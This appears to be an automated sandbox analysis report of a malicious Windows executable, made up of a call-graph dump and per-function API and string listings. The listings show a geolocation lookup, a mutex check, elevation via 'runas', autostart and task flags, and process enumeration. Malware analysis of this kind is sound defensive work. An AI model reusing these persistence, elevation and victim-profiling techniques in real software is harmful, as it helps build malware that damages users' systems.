TerminateProcess CloseHandle 44156 41a451 44151->44156 44472 40ef50 58 API calls 2 library calls 44152->44472 44475 40ef50 58 API calls 2 library calls 44153->44475 44154 41a624 GetVersion 44154->44140 44161 41a632 lstrcpyW lstrcatW lstrcatW 44154->44161 44155 41a5d4 44467 40d240 141 API calls 4 library calls 44155->44467 44156->44013 44164 41a3f7 44158->44164 44159->44137 44166 41a674 _memset 44161->44166 44164->44013 44165 41a7ec 44167 41a7f1 lstrlenA 44165->44167 44170 41a6b4 ShellExecuteExW 44166->44170 44473 420c62 58 API calls 5 library calls 44167->44473 44168->44140 44168->44143 44168->44147 44168->44154 44170->44143 44190 41a6e3 44170->44190 44171 41a8da 44185 41a92f 44171->44185 44476 413ea0 59 API calls ___check_float_string 44171->44476 44172 41a810 _memset 44176 41a81e MultiByteToWideChar lstrcatW 44172->44176 44173 41a72f 44178 41a780 44173->44178 44470 413ea0 59 API calls ___check_float_string 44173->44470 44176->44167 44177 41a847 lstrlenW 44176->44177 44179 41a8a0 CreateMutexA 44177->44179 44180 41a856 44177->44180 44181 41a79c CreateThread 44178->44181 44471 413ff0 59 API calls ___check_float_string 44178->44471 44179->44153 44474 40e760 95 API calls 44180->44474 44181->44152 44634 41dbd0 95 API calls 4 library calls 44181->44634 44184 41a860 CreateThread WaitForSingleObject 44184->44179 44635 41e690 203 API calls 8 library calls 44184->44635 44477 415c10 44185->44477 44187 41a98c 44492 412840 60 API calls 44187->44492 44189 41a997 44493 410fc0 93 API calls 4 library calls 44189->44493 44190->44013 44192 41a9ab 44193 41a9c2 lstrlenA 44192->44193 44193->44190 44194 41a9d8 44193->44194 44195 415c10 59 API calls 44194->44195 44196 41aa23 44195->44196 44494 412840 60 API calls 44196->44494 44198 41aa2e lstrcpyA 44200 41aa4b 44198->44200 44201 415c10 59 API calls 44200->44201 44202 41aa90 44201->44202 44495 40ef50 58 API calls 2 library calls 44202->44495 44204 41aaa0 44206 41aaf5 44204->44206 44496 413ea0 59 API calls ___check_float_string 44204->44496 44497 413ff0 59 API calls ___check_float_string 44206->44497 44208 41ab1d 44498 412900 60 API calls 44208->44498 44211 41ab28 _memmove 44499 40ef50 58 API calls 2 library calls 44211->44499 44212 41abc5 44214 41ac1e 44212->44214 44500 413ea0 59 API calls ___check_float_string 44212->44500 44501 413ff0 59 API calls ___check_float_string 44214->44501 44216 41ac46 44502 412900 60 API calls 44216->44502 44219 41ac51 _memmove 44503 40ef50 58 API calls 2 library calls 44219->44503 44220 41acee 44222 41ad43 44220->44222 44504 413ea0 59 API calls ___check_float_string 44220->44504 44505 413ff0 59 API calls ___check_float_string 44222->44505 44224 41ad6b 44506 412900 60 API calls 44224->44506 44226 415c10 59 API calls 44227 41ae2a 44226->44227 44507 413580 59 API calls 44227->44507 44228 41ad76 _memmove 44228->44226 44230 41ae3c 44231 415c10 59 API calls 44230->44231 44232 41ae76 44231->44232 44508 413580 59 API calls 44232->44508 44234 41ae82 44235 415c10 59 API calls 44234->44235 44236 41aebc 44235->44236 44509 413580 59 API calls 44236->44509 44238 41aec8 44239 415c10 59 API calls 44238->44239 44240 41af02 44239->44240 44510 413580 59 API calls 44240->44510 44242 41af0e 44243 415c10 59 API calls 44242->44243 44244 41af48 44243->44244 44511 413580 59 API calls 44244->44511 44246 41af54 44247 415c10 59 API calls 44246->44247 44248 41af8e 44247->44248 44512 413580 59 API calls 44248->44512 44250 41af9a 44251 415c10 59 API calls 44250->44251 44252 41afd4 44251->44252 44513 413580 59 API calls 44252->44513 44254 41afe0 44514 413100 59 API calls 44254->44514 44256 41b001 44515 413580 59 API calls 44256->44515 44258 41b025 44516 413100 59 API calls 44258->44516 44260 41b03c 44517 413580 59 API calls 44260->44517 44262 41b059 44518 413100 59 API calls 44262->44518 44264 41b070 44519 413580 59 API calls 44264->44519 44266 41b07c 44520 413100 59 API calls 44266->44520 44268 41b093 44521 413580 59 API calls 44268->44521 44270 41b09f 44522 413100 59 API calls 44270->44522 44272 41b0b6 44523 413580 59 API calls 44272->44523 44274 41b0c2 44524 413100 59 API calls 44274->44524 44276 41b0d9 44525 413580 59 API calls 44276->44525 44278 41b0e5 44526 413100 59 API calls 44278->44526 44280 41b0fc 44527 413580 59 API calls 44280->44527 44282 41b108 44284 41b130 44282->44284 44528 41cdd0 59 API calls 44282->44528 44529 40ef50 58 API calls 2 library calls 44284->44529 44286 41b16e 44288 41b1a5 GetUserNameW 44286->44288 44530 412de0 59 API calls 44286->44530 44289 41b1c9 44288->44289 44531 412c40 59 API calls 44289->44531 44291 41b1d8 44532 412bf0 59 API calls 44291->44532 44293 41b1ea 44533 40ecb0 60 API calls 2 library calls 44293->44533 44295 41b2f5 44538 4136c0 59 API calls 44295->44538 44297 41b308 44539 40ca70 59 API calls 44297->44539 44299 41b311 44540 4130b0 59 API calls 44299->44540 44302 41b322 44541 40c740 120 API calls 4 library calls 44302->44541 44305 41b327 44542 4111c0 169 API calls 2 library calls 44305->44542 44308 41b33b 44543 41ba10 LoadCursorW RegisterClassExW 44308->44543 44310 41b343 44544 41ba80 CreateWindowExW ShowWindow UpdateWindow 44310->44544 44311 413100 59 API calls 44316 41b1f3 44311->44316 44313 41b34b 44313->44190 44545 410a50 65 API calls 44313->44545 44316->44295 44316->44311 44534 412c40 59 API calls 44316->44534 44535 412900 60 API calls 44316->44535 44536 413580 59 API calls 44316->44536 44537 40f1f0 59 API calls 44316->44537 44317 41b379 44546 413100 59 API calls 44317->44546 44319 41b3a5 44547 413580 59 API calls 44319->44547 44321 41b48b 44553 41fdc0 CreateThread 44321->44553 44323 41b49f GetMessageW 44324 41b4ed 44323->44324 44325 41b4bf 44323->44325 44326 41b502 PostThreadMessageW 44324->44326 44327 41b55b 44324->44327 44328 41b4c5 TranslateMessage DispatchMessageW GetMessageW 44325->44328 44330 41b510 PeekMessageW 44326->44330 44331 41b564 PostThreadMessageW 44327->44331 44332 41b5bb 44327->44332 44328->44324 44328->44328 44333 41b546 WaitForSingleObject 44330->44333 44334 41b526 DispatchMessageW PeekMessageW 44330->44334 44335 41b570 PeekMessageW 44331->44335 44332->44190 44338 41b5d2 CloseHandle 44332->44338 44333->44327 44333->44330 44334->44333 44334->44334 44336 41b5a6 WaitForSingleObject 44335->44336 44337 41b586 DispatchMessageW PeekMessageW 44335->44337 44336->44332 44336->44335 44337->44336 44337->44337 44338->44190 44343 41b3b3 44343->44321 44548 41c330 59 API calls 44343->44548 44549 41c240 59 API calls 44343->44549 44550 41b8b0 59 API calls 44343->44550 44551 413260 59 API calls 44343->44551 44552 41fa10 CreateThread 44343->44552 44636 427e0e 44344->44636 44346 427f4c 44346->44014 44347->43987 44348->43991 44349->43998 44353->44017 44354->44023 44355->44025 44356->44029 44357->44030 44359 428c9d 44358->44359 44361 425179 44359->44361 44363 428cbb 44359->44363 44367 43b813 44359->44367 44361->44034 44364 432553 TlsSetValue 44361->44364 44363->44359 44363->44361 44375 4329c9 Sleep 44363->44375 44364->44037 44365->44041 44366->44038 44368 43b81e 44367->44368 44371 43b839 44367->44371 44369 43b82a 44368->44369 44368->44371 44376 425208 58 API calls __getptd_noexit 44369->44376 44370 43b849 HeapAlloc 44370->44371 44373 43b82f 44370->44373 44371->44370 44371->44373 44377 42793d DecodePointer 44371->44377 44373->44359 44375->44363 44376->44373 44377->44371 44379 428b1b EnterCriticalSection 44378->44379 44380 428b08 44378->44380 44379->44045 44388 428b9f 58 API calls 10 library calls 44380->44388 44382 428b0e 44382->44379 44389 427c2e 58 API calls 3 library calls 44382->44389 44385->44058 44386->44049 44387->44050 44388->44382 44390->44066 44391->44070 44392->44081 44394 420c1f __dosmaperr 44393->44394 44395 420bf6 RtlFreeHeap 44393->44395 44394->44072 44395->44394 44396 420c0b 44395->44396 44400 425208 58 API calls __getptd_noexit 44396->44400 44398 420c11 GetLastError 44398->44394 44399->44084 44400->44398 44402 43aeb8 EncodePointer 44401->44402 44402->44402 44403 43aed2 44402->44403 44403->44088 44404->44090 44406 40cf32 _memset __ftell_nolock 44405->44406 44407 40cf4f InternetOpenW 44406->44407 44408 415c10 59 API calls 44407->44408 44409 40cf8a InternetOpenUrlW 44408->44409 44410 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 44409->44410 44418 40cfb2 44409->44418 44556 4156d0 44410->44556 44412 40d000 44413 4156d0 59 API calls 44412->44413 44414 40d049 44413->44414 44414->44418 44575 413010 59 API calls 44414->44575 44416 40d084 44416->44418 44576 413010 59 API calls 44416->44576 44418->44094 44581 41ccc0 44419->44581 44602 41cc50 44422->44602 44425 41a04d 44425->44106 44425->44111 44428 413ab2 44427->44428 44435 413ad0 GetModuleFileNameW PathRemoveFileSpecW 44427->44435 44429 413b00 44428->44429 44430 413aba 44428->44430 44610 44f23e 59 API calls 2 library calls 44429->44610 44432 423b4c 59 API calls 44430->44432 44433 413ac7 44432->44433 44433->44435 44611 44f1bb 59 API calls 3 library calls 44433->44611 44437 418400 44435->44437 44438 418437 44437->44438 44442 418446 44437->44442 44438->44442 44612 415d50 59 API calls ___check_float_string 44438->44612 44440 4184b9 44440->44116 44442->44440 44613 418d50 59 API calls 44442->44613 44614 42f7c0 44443->44614 44446 4122bd K32EnumProcesses 44448 4122d3 44446->44448 44449 4122df 44446->44449 44447 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 44447->44446 44448->44122 44450 412353 44449->44450 44451 4122f0 OpenProcess 44449->44451 44450->44122 44452 412346 CloseHandle 44451->44452 44453 41230a K32EnumProcessModules 44451->44453 44452->44450 44452->44451 44453->44452 44454 41231c K32GetModuleBaseNameW 44453->44454 44616 420235 44454->44616 44456 41233e 44456->44452 44457 412345 44456->44457 44457->44452 44458->44100 44459->44136 44460->44142 44461->44151 44462->44128 44463->44128 44464->44134 44465->44144 44466->44155 44467->44168 44468->44143 44469->44173 44470->44173 44471->44181 44472->44165 44473->44172 44474->44184 44475->44171 44476->44171 44478 415c66 44477->44478 44479 415c1e 44477->44479 44480 415c76 44478->44480 44481 415cff 44478->44481 44479->44478 44489 415c45 44479->44489 44487 415c88 ___check_float_string 44480->44487 44630 416950 59 API calls 2 library calls 44480->44630 44631 44f23e 59 API calls 2 library calls 44481->44631 44487->44187 44629 414690 59 API calls ___check_float_string 44489->44629 44491 415c60 44491->44187 44492->44189 44493->44192 44494->44198 44495->44204 44496->44204 44497->44208 44498->44211 44499->44212 44500->44212 44501->44216 44502->44219 44503->44220 44504->44220 44505->44224 44506->44228 44507->44230 44508->44234 44509->44238 44510->44242 44511->44246 44512->44250 44513->44254 44514->44256 44515->44258 44516->44260 44517->44262 44518->44264 44519->44266 44520->44268 44521->44270 44522->44272 44523->44274 44524->44276 44525->44278 44526->44280 44527->44282 44528->44284 44529->44286 44530->44286 44531->44291 44532->44293 44533->44316 44534->44316 44535->44316 44536->44316 44537->44316 44538->44297 44539->44299 44540->44302 44541->44305 44542->44308 44543->44310 44544->44313 44545->44317 44546->44319 44547->44343 44548->44343 44549->44343 44550->44343 44551->44343 44552->44343 44632 41f130 218 API calls ___get_qualified_locale 44552->44632 44553->44323 44633 41fd80 64 API calls 44553->44633 44557 415735 44556->44557 44558 4156de 44556->44558 44559 4157bc 44557->44559 44560 41573e 44557->44560 44558->44557 44567 415704 44558->44567 44580 44f23e 59 API calls 2 library calls 44559->44580 44563 415750 ___check_float_string 44560->44563 44579 416760 59 API calls 2 library calls 44560->44579 44563->44412 44569 415709 44567->44569 44570 41571f 44567->44570 44577 413ff0 59 API calls ___check_float_string 44569->44577 44578 413ff0 59 API calls ___check_float_string 44570->44578 44573 415719 44573->44412 44574 41572f 44574->44412 44575->44416 44576->44418 44577->44573 44578->44574 44579->44563 44587 423b4c 44581->44587 44583 41ccca 44586 41a00a 44583->44586 44597 44f1bb 59 API calls 3 library calls 44583->44597 44586->44103 44586->44104 44589 423b54 44587->44589 44590 423b6e 44589->44590 44592 423b72 std::exception::exception 44589->44592 44598 42793d DecodePointer 44589->44598 44599 420c62 58 API calls 5 library calls 44589->44599 44590->44583 44600 430eca RaiseException 44592->44600 44594 423b9c 44601 430d91 58 API calls _free 44594->44601 44596 423bae 44596->44583 44598->44589 44599->44589 44600->44594 44601->44596 44603 423b4c 59 API calls 44602->44603 44604 41cc5d 44603->44604 44605 41cc64 44604->44605 44609 44f1bb 59 API calls 3 library calls 44604->44609 44605->44425 44608 41d740 59 API calls 44605->44608 44608->44425 44612->44442 44613->44442 44615 41222d 7 API calls 44614->44615 44615->44446 44615->44447 44617 420241 44616->44617 44618 4202b6 44616->44618 44625 420266 44617->44625 44626 425208 58 API calls __getptd_noexit 44617->44626 44628 4202c8 60 API calls 3 library calls 44618->44628 44621 4202c3 44621->44456 44622 42024d 44627 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44622->44627 44624 420258 44624->44456 44625->44456 44626->44622 44627->44624 44628->44621 44629->44491 44630->44487 44637 427e1a _flsall 44636->44637 44638 428af7 __lock 51 API calls 44637->44638 44639 427e21 44638->44639 44640 427eda _doexit 44639->44640 44641 427e4f DecodePointer 44639->44641 44656 427f28 44640->44656 44641->44640 44643 427e66 DecodePointer 44641->44643 44650 427e76 44643->44650 44645 427f37 _flsall 44645->44346 44647 427f1f 44661 427b0b 44647->44661 44648 427e83 EncodePointer 44648->44650 44650->44640 44650->44648 44651 427e93 DecodePointer EncodePointer 44650->44651 44654 427ea5 DecodePointer DecodePointer 44650->44654 44651->44650 44654->44650 44657 427f08 44656->44657 44658 427f2e 44656->44658 44657->44645 44660 428c81 LeaveCriticalSection 44657->44660 44664 428c81 LeaveCriticalSection 44658->44664 44660->44647 44665 427ad7 GetModuleHandleExW 44661->44665 44664->44657 44666 427af0 GetProcAddress 44665->44666 44667 427b07 ExitProcess 44665->44667 44666->44667 44668 427b02 44666->44668 44668->44667

                                                                                                  Executed Functions

                                                                                                  Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                    • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                    • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006DAEA8,?), ref: 0041A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                    • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                    • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                    • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                  • API String ID: 2957410896-3144399390
                                                                                                  • Opcode ID: 5f8a304aa6624fcf05a27cac1293d50e699137b1ca381170fbe135d85099863d
                                                                                                  • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                  • Opcode Fuzzy Hash: 5f8a304aa6624fcf05a27cac1293d50e699137b1ca381170fbe135d85099863d
                                                                                                  • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                  • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 622 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 629 40cfb2-40cfb4 622->629 630 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 622->630 631 40d213-40d217 629->631 635 40d000-40d01d 630->635 633 40d224-40d236 631->633 634 40d219-40d221 call 422587 631->634 634->633 637 40d023-40d02c 635->637 638 40d01f-40d021 635->638 641 40d030-40d035 637->641 640 40d039-40d069 call 4156d0 call 414300 638->640 647 40d1cb 640->647 648 40d06f-40d08b call 413010 640->648 641->641 642 40d037 641->642 642->640 650 40d1cd-40d1d1 647->650 654 40d0b9-40d0bd 648->654 655 40d08d-40d091 648->655 652 40d1d3-40d1db call 422587 650->652 653 40d1de-40d1f4 650->653 652->653 657 40d201-40d20f 653->657 658 40d1f6-40d1fe call 422587 653->658 662 40d0cd-40d0e1 call 414300 654->662 663 40d0bf-40d0ca call 422587 654->663 659 40d093-40d09b call 422587 655->659 660 40d09e-40d0b4 call 413d40 655->660 657->631 658->657 659->660 660->654 662->647 673 40d0e7-40d149 call 413010 662->673 663->662 676 40d150-40d15a 673->676 677 40d160-40d162 676->677 678 40d15c-40d15e 676->678 680 40d165-40d16a 677->680 679 40d16e-40d18b call 40b650 678->679 684 40d19a-40d19e 679->684 685 40d18d-40d18f 679->685 680->680 681 40d16c 680->681 681->679 684->676 686 40d1a0 684->686 685->684 687 40d191-40d198 685->687 688 40d1a2-40d1a6 686->688 687->684 689 40d1c7-40d1c9 687->689 690 40d1b3-40d1c5 688->690 691 40d1a8-40d1b0 call 422587 688->691 689->688 690->650 691->690
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0040CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                  Strings
                                                                                                  • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                  • "country_code":", xrefs: 0040CFE1
                                                                                                  • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-2962370585
                                                                                                  • Opcode ID: cde4b8cead4c16c4b17715eb77caab7b53abcba9a36877814266cb784c35ebad
                                                                                                  • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                  • Opcode Fuzzy Hash: cde4b8cead4c16c4b17715eb77caab7b53abcba9a36877814266cb784c35ebad
                                                                                                  • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 694 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                    • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                    • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2427264223-472376889
                                                                                                  • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                  • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                  • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                  • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 697 427f3d-427f47 call 427e0e 699 427f4c-427f50 697->699
                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00427F47
                                                                                                    • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                  • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
